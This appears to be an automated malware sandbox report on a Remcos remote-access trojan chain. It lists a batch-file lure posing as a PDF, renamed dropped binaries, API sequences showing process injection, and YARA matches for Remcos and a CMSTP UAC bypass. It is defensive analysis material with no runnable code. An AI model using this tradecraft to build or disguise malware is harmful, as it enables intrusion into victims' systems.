Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B19654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	26_2_02B19654
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B19738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	26_2_02B19738
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B195CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	26_2_02B195CC
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B16AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,	26_2_02B16AE0
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B1421A GetThreadContext,SetThreadContext,NtResumeThread,	26_2_02B1421A
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B1421C GetThreadContext,SetThreadContext,NtResumeThread,	26_2_02B1421C
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B13032 NtAllocateVirtualMemory,	26_2_02B13032
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B19578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	26_2_02B19578
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B1399C NtProtectVirtualMemory,	26_2_02B1399C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	47_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_004016FD NtdllDefWindowProc_A,	49_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_004017B7 NtdllDefWindowProc_A,	49_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00402CAC NtdllDefWindowProc_A,	53_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00402D66 NtdllDefWindowProc_A,	53_2_00402D66
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A36AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,	60_2_02A36AE0
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A33380 NtWriteVirtualMemory,	60_2_02A33380
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A33034 NtAllocateVirtualMemory,	60_2_02A33034
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A39738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	60_2_02A39738
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A33A34 NtProtectVirtualMemory,	60_2_02A33A34
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A3421A Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,	60_2_02A3421A
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A3421C Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,	60_2_02A3421C
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A33032 NtAllocateVirtualMemory,	60_2_02A33032
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A39809 NtQueryInformationFile,NtReadFile,NtClose,	60_2_02A39809
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A3399C NtProtectVirtualMemory,	60_2_02A3399C
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A39654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	60_2_02A39654
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A3341B NtWriteVirtualMemory,	60_2_02A3341B
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A395CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	60_2_02A395CC
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A39578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	60_2_02A39578
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,	62_2_0041C077
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,	62_2_0041C0A3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684CF05 OpenProcess,NtSuspendProcess,CloseHandle,	62_2_0684CF05
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684CF31 OpenProcess,NtResumeProcess,CloseHandle,	62_2_0684CF31
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684EB56 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	62_2_0684EB56

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B1A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

26_2_02B1A634

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,		62_2_00416861
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_068476F1 ExitWindowsEx,LoadLibraryA,GetProcAddress,		62_2_068476F1

Source: C:\Users\Public\alpha.pif	File created: C:\Windows			Jump to behavior
Source: C:\Users\Public\alpha.pif	File created: C:\Windows \SysWOW64			Jump to behavior

Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B020B4	26_2_02B020B4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_05377194	35_2_05377194
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_0536B5C1	35_2_0536B5C1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044A030	47_2_0044A030
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0040612B	47_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0043E13D	47_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044B188	47_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00442273	47_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044D380	47_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044A5F0	47_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_004125F6	47_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_004065BF	47_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_004086CB	47_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_004066BC	47_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044D760	47_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00405A40	47_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00449A40	47_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00405AB1	47_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00405B22	47_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044ABC0	47_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00405BB3	47_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00417C60	47_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044CC70	47_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00418CC9	47_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044CDFB	47_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044CDA0	47_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044AE20	47_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00415E3E	47_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00437F3B	47_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00405038	49_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0041208C	49_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_004050A9	49_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0040511A	49_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0043C13A	49_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_004051AB	49_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00449300	49_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0040D322	49_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0044A4F0	49_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0043A5AB	49_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00413631	49_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00446690	49_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0044A730	49_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_004398D8	49_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_004498E0	49_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0044A886	49_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0043DA09	49_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00438D5E	49_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00449ED0	49_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_0041FE83	49_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00430F54	49_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_004050C2	53_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_004014AB	53_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00405133	53_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_004051A4	53_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00401246	53_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_0040CA46	53_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00405235	53_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_004032C8	53_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00401689	53_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00402F60	53_2_00402F60
Source: C:\Users\Public\ANYDESK.PIF	Code function: 60_2_02A220B4	60_2_02A220B4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0042809D	62_2_0042809D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0045412B	62_2_0045412B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004421C0	62_2_004421C0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004281D7	62_2_004281D7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0043E1E0	62_2_0043E1E0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041E29B	62_2_0041E29B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004373DA	62_2_004373DA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00438380	62_2_00438380
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00453472	62_2_00453472
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0042747E	62_2_0042747E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0043E43D	62_2_0043E43D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004325A1	62_2_004325A1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0043774C	62_2_0043774C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041F809	62_2_0041F809
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004379F6	62_2_004379F6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004279F5	62_2_004279F5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0044DAD9	62_2_0044DAD9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00433C73	62_2_00433C73
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00413CA0	62_2_00413CA0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00437CBD	62_2_00437CBD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0043DD82	62_2_0043DD82
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00435F52	62_2_00435F52
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00437F78	62_2_00437F78
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0043DFB1	62_2_0043DFB1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06831143	62_2_06831143
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06850697	62_2_06850697
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0686F2CB	62_2_0686F2CB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0686920E	62_2_0686920E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06868268	62_2_06868268
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06884300	62_2_06884300
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0685830C	62_2_0685830C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_068310BC	62_2_068310BC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0687304E	62_2_0687304E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06859065	62_2_06859065
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0686F06E	62_2_0686F06E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684F129	62_2_0684F129
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0686EE3F	62_2_0686EE3F
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06858F2B	62_2_06858F2B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0686EC10	62_2_0686EC10
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06864B01	62_2_06864B01
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06858883	62_2_06858883

Source: Joe Sandbox View

Dropped File: C:\Users\Public\alpha.pif B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450

Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02A24414 appears 154 times
Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02B0457C appears 835 times
Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02B0421C appears 64 times
Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02A33E20 appears 48 times
Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02B13E9C appears 45 times
Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02B04414 appears 246 times
Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02A2457C appears 570 times
Source: C:\Users\Public\ANYDESK.PIF	Code function: String function: 02B13E20 appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 0686595D appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 06832FA5 appears 37 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 0686606E appears 46 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00401EBF appears 32 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00402117 appears 39 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winZIP@93/32@3/4

Source: C:\Windows\SysWOW64\recover.exe

Code function: 47_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

47_2_0041A225

Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,	53_2_00410DE1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	62_2_00417AD9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06848967 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	62_2_06848967

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B0793A GetDiskFreeSpaceA,

26_2_02B0793A

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B16760 CreateToolhelp32Snapshot,

26_2_02B16760

Source: C:\Windows\SysWOW64\recover.exe

Code function: 47_2_00416A46 FindResourceW,SizeofResource,LoadResource,LockResource,

47_2_00416A46

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

62_2_0041AC43

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\expha.pif

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-14MUP4

Source: C:\Windows\SysWOW64\recover.exe

File created: C:\Users\user\AppData\Local\Temp\bhv3B03.tmp

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "

Source: C:\Users\Public\ANYDESK.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\ANYDESK.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\recover.exe

System information queried: HandleInformation

Source: C:\Users\Public\rdha.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

